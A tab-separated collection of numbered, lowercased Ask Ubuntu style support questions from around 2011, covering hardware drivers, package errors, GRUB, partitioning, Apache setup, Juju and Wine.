55096	display brightness scaling is incorrect on a vaio cw	my display brightness adjustment is off by a factor of 10 , i.e . it 's brightest at 10 % instead of at 100 % , and the difference between 0 % and 1 % is a little too high . any way to fix either of these problems ? ( vaio cw laptop )
55099	dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0	been trying to install git-core package for almost more than half a day now . everytime i do , i get this error : dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0 : newline in field name `../../../../../share/pyshared/updatemanager/core/__init__.py' i 've also tried running sudo apt-get update and sudo apt-get install -- fix-missing . even tried rebooting and cleaning the apt-get cache , still doesnt work .
55101	how do you open the original file from a u1conflict file ? and how do you stop it from happening again ?	i have a folder which has appeared called u1conflict . the original file is totally blank . i ca n't open the document in its original formatting from the u1conflict file , and i 'm feeling a little mistrustful of ubuntu one now since i 'm trying to complete my masters dissertation ! how do i open the original document in libreoffice ? how do i stop this from happening again ? thanks !
55103	samsung scx-3201 mfp scanner not working	i have a samsung scx-3201 mfp multifunction printer and after plugging it into the computer it recognises the printer part , but the scanner is not detected . since that i 've fresh installed and did not try it again . the built-in scan application nor sane detects it . i did try samsung 's proprietary software.neither did it detect it
55106	should i mix kubuntu ppas ?	if i am using the ppa : kubuntu-ppa/backports ppa and the ppa : kubuntu-ppa , will there be any interference between the two ? so in essence should i disable the ppa : kubuntu-ppa ppa ? thanks
55114	wicd works fine , command line fails	connecting to the internet using wicd and networkmanager works just fine , but through the command-line i get the next error : # ifconfig eth1 down # dhclient -r eth1 # ifconfig eth1 up # iwconfig eth1 essid `` [ essid ] '' # iwconfig eth1 key [ key ] # dhclient eth1 -v internet systems consortium dhcp client 4.1.1-p1 copyright 2004-2010 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/eth1/00:15 : fa:31 : b1:42 sending on lpf/eth1/00:15 : fa:31 : b1:42 sending on socket/fallback dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 6 dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 8 dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 14 dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 10 dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 12 dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 8 no dhcpoffers received . trying recorded lease 10.0.0.8 ping 10.0.0.1 ( 10.0.0.1 ) 56 ( 84 ) bytes of data . -- - 10.0.0.1 ping statistics -- - 1 packets transmitted , 0 received , +1 errors , 100 % packet loss , time 0ms no working leases in persistent database - sleeping . what are wicd and networkmanager doing what i do n't ? i tried ethereality 's answer i want to be able to make network-connection with the basic commands , not with some tool ( command based or graphic ) that make use of these command - i want to have control if certain software fail makes no difference either . but ! , i just discovered that if i make a connection with wicd-curses , then disconnect and try right after that by command line , then connection is established . # ifconfig eth1 down # dhclient -r eth1 # ifconfig eth1 up # iwconfig eth1 mode managed # iwconfig eth1 essid `` [ essid ] '' # iwconfig eth1 key [ key ] # dhclient eth1 -v internet systems consortium dhcp client 4.1.1-p1 copyright 2004-2010 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/eth1/00:15 : fa:31 : b1:42 sending on lpf/eth1/00:15 : fa:31 : b1:42 sending on socket/fallback dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 dhcpoffer of 10.0.0.3 from 10.0.0.1 dhcprequest of 10.0.0.3 on eth1 to 255.255.255.255 port 67 dhcpack of 10.0.0.3 from 10.0.0.1 bound to 10.0.0.3 -- renewal in 33918 seconds . but if i make before i leave wicd-curses another connection ( to another ap ) then command line connection fails . perhaps a clue for what is going on ? security is wep
55115	everything unity & gnome gets reset on reboot / logoff / shutdown	really odd issue here , whenever i log out , ubuntu looses all settings for the launcher preferences - i get the defaults again , that is , from the top - home , firefox , libreoffice writer , calc and impress , software centre , ubuntu one , then workspace , applications and files . anything i add is reset to these on logout . my network preferences are lost ( not too much of an issue , just annoying ) . the only thing that stays seems to be the theme ... i 've tried resetting gnome and unity , which does n't fix it . i 've tried the solution in this question and it did n't work : how do i make unity remember which applications are in the launcher ?
55120	accidentaly removed ubuntu from grub . how do i get it back ?	i used grub-customizer to remove some old entries , but i made a mistake and now there 's only windows left in grub . i tried booting into ubuntu through grub 's command line but i do n't know how to do anything there . just booting once would be enough , or , if possible , fixing the listing right there in the command line .
55124	suspending ubuntu session when laptop lid is closed ...	i 'm using a toshiba satellite l305 running ubuntu . one issue , the laptop usually suspends itself when the lid closed , however ubuntu only does this half of the time , the other half it keeps the system running . very inconvenient , because when i put my laptop in my briefcase , if it 's not suspended , it 's just blowing hot air , ca n't be good for the computer . i do n't think it 's a hardware issue , because when i was running windows on this machine i never had this problem .
55130	how does software center determine what is a `` technical item '' and what is n't ?	i 'm a total newb to packaging , but i managed to get a ppa set up and working . but when i look for my software in ubuntu software center , it will only show up after clicking `` show _ technical items '' . my software is not a technical item . how do i convey this information to the software center so it can appropriately categorize it ? i ship a .desktop file and it shows up in the menu perfectly . software center even lists the path to the menu entry after i install it ( `` find it in the menu : ... '' ) . edit : i spent some time on various ubuntu irc channels , and from conversations with a couple different people , the consensus seems to be that there is no way to fix this issue ( and a couple others , such as showing an icon ) for ppa packages . the way things are now , packages have to be in the main repos to fully integrate with ubuntu software center .
55134	updating multiple ubuntu machines	how to update multiple ubuntu machines in a lan quickly and efficiently saving network bandwidth ?
55137	makeinitramfs and grub-update for compiled ubuntu linux kernel	i 'm modifying the ubuntu kernel and i 've noticed : whenever i install kernel updates from the main repos initramfs and grub are updated automatically . however , in compiled kernels these steps are completed outside of the install of the newly created kernel . i 'm loosely following the directions from : ubuntu kerenelteam wiki : git kernel building how can i produce the same effect for my version of the kernel packages ? would this require a third package that depends on the image/header produced which then runs the final setup scripts ?
55138	what are the different ubuntu kernel git tags for ?	going through the ubuntu kernel git source there are several tags , the meaning of which i 'm uncertain of . how can i find out which tag is the one currently in the repos for each version of ubuntu ? is it okay to compile the latest tagged versions of the kernel ?
55140	error during device i/o when using usb scanner	i have a canon lide 100 scanner that does n't properly initialize on first scan attempt . when i trigger a scan , it seems to start ( you hear the scanner beginning to engage ) , but then my scanning application ( gscan2pdf ) echoes back : `` error during device i/o . '' if i close the application , and restart another scan , there is no error and it scans properly . i get the same behavior if i use simple scan or xsane . there are many other reports of this behavior , and others have suggested that my system has put the usb port to sleep ( at least partially ) to save power . it seems to not properly wake up . i 'm using 10.10 and it has been suggested that i may be able to tell my system to not autosuspend the usb port , but am not sure how to do that . any input on this is appreciated .
55141	best configuration for ubuntu and objective-c	can someone post a proper ubuntu configuration for developing ipad 's applications ? i need a good ide and a guide on how to install any essential compilers etc . thanks
55147	replacing meego with ubuntu on a netbook for development ?	there 's a netbook coming out that i 'm interested in , the asus eee pc x101 , that comes with meego pre-installed , but i 'd prefer to wipe that os and install ubuntu . are there any issues i should consider before doing this ? is meego more tuned for this kind of ultra-portable device , ie . cpu and battery life ? my computing needs are modest , i usually run a terminal , text editor , and browser at the same time for web development , maybe some music playing as well . the portability of this computer is attractive to me , but if i ca n't work on it , then it does n't help me .
55148	twitter app that supports real time updating	hi everyone i need a twitter client that fully integrates with the unity shell and is capable of providing real time updates for my mentions , direct messages etc when minimised
55154	tesseract and ocropus	i was wondering what relations are between tesseract and ocropus ? is ocropus a wrapper of tesseract ? or are they now developing independently ? what are some advantages of one over the other ? thanks and regards !
55155	why is ocrodjvu not working while tesseract is ?	i can use tesseract v3.01 successfully . for example $ tesseract toc.tif output -l chi_sim tesseract open source ocr engine v3.01 with leptonica page 1 page 2 page 3 page 4 page 5 but with ocrodjvu v0.4.6 , a wrapper of tesseract , things go wrong : $ ocrodjvu -- language=chi toc.djvu -o tococr.djvu processing 'toc.djvu ' : - page # 1 unable to load unicharset file /usr/share/tesseract-ocr/tessdata/chi.unicharset exception in thread thread-1 : traceback ( most recent call last ) : file `` /usr/lib/python2.6/threading.py '' , line 532 , in __bootstrap_inner self.run ( ) file `` /usr/lib/python2.6/threading.py '' , line 484 , in run self.__target ( *self.__args , **self.__kwargs ) file `` /usr/share/ocrodjvu/lib/_ocrodjvu.py '' , line 445 , in page_thread result = self.process_page ( page ) file `` /usr/share/ocrodjvu/lib/_ocrodjvu.py '' , line 430 , in process_page html_file.close ( ) file `` /usr/lib/python2.6/contextlib.py '' , line 34 , in __exit__ self.gen.throw ( type , value , traceback ) file `` /usr/share/ocrodjvu/lib/_ocrodjvu.py '' , line 190 , in recognize ocropus.wait ( ) file `` /usr/share/ocrodjvu/lib/ipc.py '' , line 66 , in wait raise calledprocesserror ( return_code , self.__command ) calledprocesserror : command 'ocroscript ' returned non-zero exit status 1 as mentioned , the unicharset file chi.unicharset is not there : $ ls -l /usr/share/tesseract-ocr/tessdata total 141656 -rw-r -- r -- 2 root root 42782973 2011-07-29 19:16 chi_sim.traineddata -rw-r -- r -- 1 root root 56359429 2011-07-29 19:16 chi_tra.traineddata drwxr-xr-x 2 root root 4096 2011-07-30 15:07 configs -rw-r -- r -- 1 root root 3112137 2011-07-29 19:16 eng.traineddata drwxr-xr-x 2 root root 4096 2011-07-30 15:07 tessconfigs so i wonder why ocrodjvu is not working ? i am not sure if the versions of tesseract and ocrodjvu are compatible . but i install both from synaptic . my os is 10.10 .
55157	unable to change preferences in acroread v9.4.2	i can view the preferences but the selection boxes are all locked , as well as the cancel and ok buttons . the only option is to close it . have tried uninstall/re-install acroread but situation persists . is there some system settings that i need to change to unlock preferences ?
55162	shortcuts to select text in terminal	i was wondering if there are shortcuts for selecting some text in terminal , just similar to holding shift and type arrow key in editing a text file in a text editor . thanks !
55166	what to do with extra video drivers ?	i have 11.04 installed , and was poking around and saw that i had more than my intel video drivers installed . do i need them ? what is the best way to `` trim the fat '' ?
55167	how to solve gtk-warning on using gedit ?	i 'm new in using ubuntu . i got the following error for several lines after changed 'grub ' in /etc/default ( gedit:2996 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.nxbrzv ' : no such file or directory during installation , i created 2 disk partition for ubuntu . one is swapspace . another is for '/ ' . is this a big issue ? how to solve ? thx in advance
55169	keyboard layout switching on restart	i have two keyboard layouts that i use , my default keyboard is an usa layout , with a secondary slovenian layout . i use the slovenian layout only when i need some special characters when writing emails and such . but my problem is this : every time i reboot my computer , the layout indicator shows i am on the usa layout , but the actual keyboard layout is slovenian . then i normally have to switch from usa to slovenian and back , to get the layout i want . is there anything i can do about this ? i do n't restart my computer often , but when i do i forget about that , and typing the passwords like that does n't work .
55170	wacom bamboo pen scaling issues	i recently purchased a wacom bamboo pen . it worked out of the box with ubuntu natty narwhal , but i 'm annoyed with the fact that the tablet is proportional to the screen . this makes a little line on the tablet show up as a large line on my screen ( i 'm using xournal ) . is there a way to make it so that there is no scaling between my screen and the tablet ?
55171	why does a command work from shell , but not from the applications menu ?	i 'm trying to add a command to my applications menu : but when i select it from the applications menu , it does n't do anything . when i run that same command from the shell , however , it runs fine . why ? ( also , why does pycharm need sudo priviledges ? )
55176	can you set the defaul remote desktop app to let your computer be viewed off your network ?	the remote desktop app when enabled does n't work with computers outside your network . can you set it to let you do such ? if so how ? is there a separate app that will let me do such a thing ? -- samercier
55178	using 11.04 themes in 10.04 ?	i like the `` ambiance '' theme in ubuntu 11.04 better than the older `` ambiance '' theme in ubuntu 10.04 . i have one machine at work that i 'm supposed to use the 10.04 , and would like to 'update ' the themes package . i tried temporarily adding the natty repository to grab the light-themes package , but synaptics wants me to essentially reinstall all of my desktop to do that . i assume there is a better way . searching around , all i 've been able to find is this : http : //ubuntuforums.org/showthread.php ? t=1785600 which has the same question and is marked `` solved '' , but references something i ca n't access . so there appears to be some kind of simple solution , but i do n't know what to do . i 've tried to grab the updated light-themes .deb package , but dpkg wo n't install it since it claims it breaks something called `` metacity '' . i 'd like to learn how to manage packages better . can someone help me understand the appropriate way to update themes ?
55179	what is the purpose of the `` bootstrapping instance '' in juju ?	so i 've recently played around with juju , and i see quite a bit of potential . but there are a few things i do n't exactly understand . most notably , i 'm not sure of the purpose of the `` bootstrapping instance '' ( aka `` bootstrapping node '' or machine â0â ) . using the example from the user tutorial : $ bin/juju status machines : 0 : { dns-name : ec2-50-16-61-111.compute-1.amazonaws.com , instance-id : i-2a702745 } 1 : { dns-name : ec2-50-16-117-185.compute-1.amazonaws.com , instance-id : i-227e294d } 2 : { dns-name : ec2-184-72-156-54.compute-1.amazonaws.com , instance-id : i-9c7e29f3 } services : mysql : formula : local : mysql-11 relations : { } units : mysql/0 : machine : 1 relations : { } state : started wordpress : formula : local : wordpress-29 relations : { } units : wordpress/0 : machine : 2 relations : { } state : started machine 1 is the mysql instance , and machine 2 is the wordpress instance . what exactly is machine 0 up to ?
55180	is there a way to stop and restart a juju deployment ?	i would have thought that juju shutdown would move the instances in the deployment from `` running '' to `` stopped . '' instead it actually terminates all instances . are juju deployments inherently ephemeral ? is there any way to stop and restart an juju deployment ?
55182	how to change partitioning - may involve conversion of a partition from primary to extended	i am having trouble thinking through how i can achieve my partitioning goals . now my partitions are : sda1 ( wina ) ( primary ) sda2 ( winb ) ( primary ) sda3 ( / for ubuntu ) ( primary ) what i want to migrate into is ( obviously partition numbers need not be exactly like that ) sda1 ( wina ) ( primary ) sda2 ( winb ) ( primary ) sda3 ( /boot ) ( primary ) sda4 - extended which will contain sda5 ( /home ) sda6 ( / for ubuntu ) sda7 ( swap ) i know i may be asking too much , but what would a way to do it ? one way i have thought is create a new primary partition for /boot and split it from the root partition into the new one . it should n't be too hard . then the disk will have 4 primary partitions . somehow convert the root ubuntu partition from primary to extended . split that last partition in 3 extended partitions ( root , /home , swap ) and split the contents there . i am obviously stuck on the 2nd part . another way could be ( maybe easier ) : create an extended partition ( or two ) split /home there somehow move everything except /boot to the extended partition . this way /boot will stay on the primary partition that exists now , and will be shrunk as needed , and everything else will end up to the extended partitions . this may sound better , but i 'm not too sure how to do the 3rd part . some details : the disk is almost empty , so i have space to move things around in it , shrink the ubuntu partition etc . i do n't want to touch the windows partitions in any way . reinstallation is not an option . also using a different partitioning scheme with fewer partitions is not an option ( for example not having a separate /boot ) any ideas ?
55184	change remote desktop permissions from the command line ( remotely ? )	i can ssh into my desktop at work and work at the command line , but i would like to use a remote desktop protocol to check on some of the programs that i left open and running . i have not set up permission to use a remote desktop client ( e.g . tsclient ) on the desktop , so my requests to connect are refused ( see picture ) . the instructions given in a previous question suggest that the following should work : gconftool-2 -s -t bool /desktop/gnome/remote_access/enabled true /usr/lib/vino/vino-server but i get this : ( 30/07/2011 11:25:35 pm autoprobing tcp port in ( all ) network interface 30/07/2011 11:25:35 pm listening ipv6 : // [ : : ] :5900 30/07/2011 11:25:35 pm listening ipv4 : //0.0.0.0:5900 30/07/2011 11:25:35 pm autoprobing selected port 5900 30/07/2011 11:25:35 pm advertising security type : 'tls ' ( 18 ) 30/07/2011 11:25:35 pm advertising authentication type : 'no authentication ' ( 1 ) 30/07/2011 11:25:35 pm advertising security type : 'no authentication ' ( 1 ) am i doing something incorrectly ? is it possible to ssh in and give myself the required permissions to use tsclient ?
55185	eclipse pdt plugin gives me trouble	editor of pdt plugin jumbles the code and does n't take responses in . i tried many things but did n't help at all . i was wondering what you guys are using to develop php applications for i am new to php . and i am a java programmer so i am more experience with eclipse that is why i need to fix this issue.below are few things i tried out reinstall pdt plugin checked if java editor works ( it works perfectly ) i am out of solutions now and only think that i can think of is that eclipse version is giving me trouble . i am using version : indigo release build id : 20110615-0604 os : ubuntu 11.04 pdt version : php development tools ( pdt ) all-in-one sdk 3.0.0.v20110516-1100-77 i am going to include few screenshots too . the screenshots were taken when i clicked in different places of the screen . and sometimes what i type is not displaying at all . another thing i want to mention is that i also have aptana plugin installed and the php is not working properly in it too . so pdt plugin might not necessarily be the cause for it . will removing aptana for php help me ? i have asked this question on stackover flow at here i hope you do n't mind the cross posting ...
55191	i can not hear an audible alert on google chat even when sound is enabled	i can not hear the audible alert on google chat even though i have enabled sound in the options . this is so with both google chrome and firefox on ubuntu natty . it would be nice to hear a beep of some sort when a typed reply arrives . any hints on what further needs to be done is most appreciated . thanks .
55199	huge icons in knode	how can i get this back to normal ? the icons should be not that big i think . i run knode 4.4.10 on kde 4.6.2 .
55201	vertical scroll does n't work on a sony vaio vpceb1s1e	i have an sony vaio vpceb1s1e that i have dual booting windows 7 and ubuntu all 64 bit in ubuntu i do n't have vertical scroll . same thing happens with fedora 15 , linuxmint11 of course 64 bit if someone has a solution ... ... ... ?
55204	how can i change the default name for the screenshots made by gnome-screenshot ?	gnome-screenshot 3.1.2 uses filenames like this one screenshot at 2011-07-31 12:13:04.png making it rather easy to see when it was taken . the problem is that it uses the colon ( : ) character - making it impossible to access such an image from windows . considering i take most of my screenshots so i can send them to windows users this has caused some problems . is there any way to change the default name that is used by the screenshot tool to replace the `` : '' with `` . '' or `` , '' ?
55205	is it safe to delete every hidden folder in the home directory ?	my $ home ( otherwise known as '~ ' ) directory has lots of hidden configuration folders . is it safe to delete all of them ? to be specific will the os break if i do so ? will my ethernet/printer/sound/graphics drivers stop working ? i do n't care about superficial things like : gnome themes , key shortcuts , font settings , etc
55210	can anyone recommend apache2 indicator for gnome panel	i just re-install my ubuntu and forgot name of apache2 service indicator , it 's a green button at start and red at stop..
55212	how do i stop the unity side bar from apearing when i try to drag & drop ?	every time i use drag & drop ( even with bookmarks in firefox or songs in banshee ) the unity side bar apears and often blocks the place where i want to drop it . is there a way to fix this ? edit : there is only one option for the launcher ( wether it appears when touching the side or the corner ) but it does n't solve the problem .
55213	how to compile the latest version of the command-line video download tool - cclive	cclive is a tool for downloading media from youtube and similar websites . i am trying to compile the latest version of cclive but can not compile the first step libquvi i am getting the following error when i do ... > sudo sh autogen.sh generate configuration files ... configure.ac:92 : warning : macro `am_iconv ' not found in library configure.ac:36 : warning : ac_lang_conftest : no ac_lang_source call detected in body ... configure.ac:92 : error : possibly undefined macro : am_iconv if this token and others are legitimate , please use m4_pattern_allow . see the autoconf documentation . autoreconf : /usr/local/bin/autoconf failed with exit status : 1 full output perhaps i am missing some dependencies or something ?
55214	how do i correctly align partions on a hdd with sector size of 4096 bytes ?	i just bought a lenovo x121e ( e-350 version ) . i was able to successfully install ubuntu 11.04 and everything is running fine ( for the system to boot an efi partition seems to be necessary however ) . the laptop has a seagate disk with a physical sector size of 4096 bytes . after ubuntu is installed disk utility reports that my partitions are not properly aligned : i have tried both fully automatic install wiping the disk ( as shown on the screenshot ) and setting the partions manually during install . both variants show misaligned partitions . is this this a bug when creating the partitions or is disk utility giving wrong information ? if the alignment is wrong and negatively affecting performance , how can i correct it ( either now or with a fresh install ) ?
55215	lenovo thinkpad w520 cpufreq frequency scaling not working	for some reason my processor always seems to run on full speed even if i do n't do anything . looking through the web , i 've found quite some suggestions . according to http : //www.thinkwiki.org/wiki/how_to_make_use_of_dynamic_frequency_scaling i should be able to list my current governors . # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors cat : /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors : no such file or directory but i can not since /sys/devices/system/cpu/cpu0/cpufreq is not existing on my computer . i have installed cpufreqd cpufrequtils and libcpufreq0 , but because of the missing directory , i get # /etc/init.d/cpufreqd start * starting cpu frequency daemon cpufreqd [ fail ] according to http : //changelog.complete.org/archives/572-saving-power-with-cpu-frequency-scaling i should load one of the available modules . # ls /lib/modules/`uname -r`/kernel/arch/*/kernel/cpu/cpufreq p4-clockmod.ko pcc-cpufreq.ko speedstep-lib.ko the only one that does not result in an error is the speedstep-lib . # modprobe speedstep-lib any idea what i can do ? # lsmod |grep cpu # lsmod |grep freq # lsmod |grep acpi thinkpad_acpi 81587 0 nvram 14419 1 thinkpad_acpi snd 67382 14 snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , thinkpad_acpi , snd_seq_device # cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 42 model name : intel ( r ) core ( tm ) i7-2720qm cpu @ 2.20ghz stepping : 7 cpu mhz : 2192.750 cache size : 6144 kb physical id : 0 siblings : 8 core id : 0 cpu cores : 4 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm c onstant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 x2apic popcnt aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tp r_shadow vnmi flexpriority ept vpid bogomips : 4385.50 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : # cpufreq-info cpufrequtils 007 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 1 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 2 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 3 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 4 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 5 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 6 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 7 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms .
55223	setting vsftpd for upload to public ( http )	i just installed lamp , vsftpd on ubuntu server 11.04 64bits and i 'm going to to adduser for ftp and let 's users ( in private lan ) upload files to public in private lan such as http : //local-server-ip/username/ could anyone recommend link or help me list these steps what i should to do ? i try it before with googling and i getting a lot of problems about permission after users add files into my specific path of apache2 , when anyone open in browser it show `` forbidden : you do n't have permission to access / ... on this server . '' then i re-install it . ( for remove my dirty configuration ) .. sorry for my terrible english
55224	a common /home partition for multiple linux distributions	i have an ubuntu installed in one partition , debian on the other and now i am planning to install backtrack and suse also . debian mounts a separate partition as its home mount point , whereas ubuntu contains its own home folder in its file system . now , i want my home partition to be shared by all other distros i have currently or might have on the future . how can i do this ? p.s . i have same username & nicknames on all the distros
55226	why is 32 bit ubuntu `` recommended '' and 64 not ?	on the ubuntu download page , you have a choice between 32 and 64 bit , and the 32 bit one is `` recommended '' . why is that ? i have a 64 bit processor on my thinkpad w520 , but i just installed the 32-bit ubuntu ( natty ) . i 'm afraid that if i do n't go along with the `` recommended '' 32-bit version , i 'll have hardware driver problems . am i just being paranoid ?
55232	why is kauth gone from heimdal-clients , and is there something to replace it with ?	i need to authorize with kerberos and i have always done that with kauth . previously it have been included in the package heimdal-clients but since natty it has been removed ( see https : //launchpad.net/ubuntu/natty/+source/heimdal/+changelog , git20101228 ) . i have searched in ubuntu packages but did n't find it . have it been replaced with something or did someone decide they did n't need it any more and therefore no one else does ?
55236	which is the correct gnupg executable to use to configure enigmail ?	i 'm trying to setup enigmail to work in thunderbird . enigmail says it could not find gnupg when i open thunderbird > tools > addons > extensions > enigmail preferences > basic tab . i looked in my /usr/bin and see there are several executables that seem relevant . which is the correct one to specify ? gpg gpg2 gpg-agent
55237	why ca n't ubuntu 11.04 installer see all my partitions ?	in february last year , i built a new pc from parts . fast foward 16 months , and i 'm repeatedly cleaning malware infections from windows 7 . i decided to try ubuntu on my pc . my pc has hardware raid . the hardware raid has two 500 gb disks set up with raid-1 mirroring . i have a 100gb partition with windows 7 and a 400gb unformatted partition . however , when i try to install ubuntu 11.04 , on the `` allocate drive space '' screen , it shows only the 100gb partition with windows 7 . it 's as if the 400gb partition does n't exist . btw , the windows 7 partition is labelled /dev/sda . the logical drives for windows 7 are /dev/mapper/pdc_bbifbfdfdi and /dev/mapper/pdc_bbifbfdfdi2 what do i need to do in order to install ubuntu on my 400gb partition ?
55239	mount a directory in another partition as /home directory	i have tried to create a separate /home partition for all my linux distros and separate all home directories as per the name of the distros i am using like /homepartition/ubuntu/user-name /homepartition/debian/user-name now , i have copied all the neccessary files to this new location and modified the /etc/fstab to mount this new location as the /home directory i added this line at the last of the file /dev/sda10/ubuntu /home ext4 nodev , nosuid 0 2 but the folder is not mounting . i am pretty much just a newbie , so please help me out .
55241	php not working under directory of mod_userdir ( ~/user )	my php code not working under directory of mod_userdir ( ~/user ) but working fine at /var/www/ , how i can dealing with this problems ? when i open a php file under ~/user my browser prompt to download
55244	how can i install a package without installing its dependencies ?	i 'm trying to install alacarte and the dependencies are huge , basically all of gnome . i know that they are unnecessary . is there an option in synaptic or an apt-get flag for this ?
55247	master volume versus application volume	i just got ubuntu 10.10 a few days ago on a new desktop and for the first few days the volume worked as expected . however , now the master volume seems to impact nothing . when i am playing rhythmbox , for example , i have to open up the sound preferences in order to change the sound for an individual application . is there any way to get the master volume setting back to where it was , able to control all the applications instead of them ignoring it ?
55253	how safe is it to use the `` ubuntu+1 '' ?	how safe is it to have a system like that - always on `` ubuntu+1 '' ( or debian sid , for that matter ) ?
55255	what command line to reliably traverse several directory levels	i have the same problem as was asked in question rename music files with missing file extensions and i found the script provided by @ gilles very educational , but unfortunately it did n't work the way i expected . what i was looking for was a script that would add a file extension to all music files without extension in all subdirectories , at all levels , below `` /path/to/music/directory/ '' . the suggested command line parameter /path/to/music/directory/ { **/ , } * makes the script go through all the files in the subdirectories one level below `` /path/to/music/directory/ '' but not at levels below that . what command line parameter should i use to traverse all files at all levels below `` directory/ '' ? would also appreciate a pointer to documentation for the { **/ , } * part . btw , for those interested in the original answer . i found that the script works better after i changed the line file -i `` $ @ '' | to file -- mime-type `` $ @ '' | ( if i had had the privilege level i would have given this as a comment in the original answer )
55260	creating synaptics entry in xorg.conf cases x to not start	ubuntu 11.04 does n't seem to have an entry for my synaptics touchpad xorg.conf file by default . as soon as i create section `` inputdevice '' identifier `` synaptics touchpad '' driver `` synaptics '' endsection then gdm fails to start at all . what is the propery way for me to enter an option for my synaptics touchpad in xorg.conf ?
55270	can i run gnome 3 in classic desktop and still switch to default unity ?	i am using unity and am pretty stisfied . anyway i want to give gnome 3 a try within my working machine . can i upgrade my system ( natty ) so i have gnome3 ( +shell ) in the classic desktop mode and still switch back to a functional unity default natty desktop ?
55272	why does my apache still do nothing after a complete purge and reinstall ?	i followed this guide , to the best of my understanding : https : //help.ubuntu.com/community/apachemysqlphp and i 'm stuck right after the install . here 's what i did so far : since i already had a working install ( which i broke ) i thought it was a good idea to start list item following the instructions at 'starting over' i typed sudo apt-get -- purge remove apache2 apache2-mpm-prefork apache2-utils apache2.2-common libapache2-mod-php5 libapr1 libaprutil1 libdbd-mysql-perl libdbi-perl libmysqlclient15off libnet-daemon-perl libplrpc-perl libpq5 mysql-client-5.0 mysql-common mysql-server mysql-server-5.0 php5-common php5-mysql which did something , but then gave error messages about packages not found etc ... since i wanted to complete this step , i sudo apt-get -- purge remove 'd all packages seperately , and followed through with necessary options . as recommended i sudo rm -r /etc/apache2'd followed by reinstalling apt-get install apache2 , no errors here it now tells me to visit http : //localhost to test the installation , which just gives me oops ! google chrome could not connect to localhost i 'm at a loss . i managed to configure my apache quite decently but wanted a redo and now i 'm stuck even before the real configuration .
55273	default fstab mount options	on a clean ubuntu 11.04 ( natty narwhal ) installation , i used just a single partition for everything . the line that got added in the fstab file is this uuid=xxx / ext4 errors=remount-ro 0 1 should n't there be a 'defaults ' in there ? i 've bumped into this while trying to move the home folder to a different partition . i 've done it , and everything is working fine . i 've added only errors=remount-ro in the fstab line for /home . now i 'm in the process of 'securing ' it , and choosing those options more wisely ( like adding nodev and nosuid ) . so , do i need to add 'defaults ' or not ? why is it not added ? which specific options are the 'defaults ' anyway in natty narwhal ? do i need to add uuid=xxx /home ext4 nodev , nosuid , errors=remount-ro 0 2 or uuid=xxx /home ext4 defaults , nodev , nosuid , error=remount-ro 0 2 or something else ? also , i 've seen that relatime is in the defaults for natty narwhal . but are the defaults running if there is no mention of the defaults keyword in fstab and the 'mount ' output ?
55275	how to setup a cdrom drive in wine	okay , so i installed wine , and installed the first starcraft , but when i try to run it , it tells me that the cd is n't in the cdrom drive ( but it 's already in there ) and asks me to insert it . so , i did some searching , and i found out that i need to setup a cdrom drive in wine , but when i autodetect for drives , it does n't find the cdrom drive ( it does show drive d , but it does n't say that it 's a cdrom drive ) . so , does anyone know how i can find/setup a cdrom drive ? thanks !
